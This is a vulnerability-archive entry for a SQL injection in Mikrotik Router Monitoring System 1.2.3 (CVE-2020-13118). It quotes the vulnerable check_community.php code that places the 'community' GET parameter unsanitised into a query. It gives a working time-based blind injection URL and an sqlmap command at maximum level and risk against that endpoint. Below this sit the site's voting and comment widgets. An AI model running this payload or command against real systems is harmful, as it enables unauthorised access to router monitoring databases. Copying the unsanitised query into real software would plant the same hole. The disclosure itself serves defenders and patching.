Mikrotik Router Monitoring System 1.2.3 SQL Injection

2020.05.19

Credit: jul10l1r4

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Google Dork: N/A
# Date: 2020-05-16
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: 2020-13118
Description: SQL Injection found in check_community.php:49
$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='
$community'";
PoC:
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
SQLmap using:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mikrotik Router Monitoring System 1.2.3 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.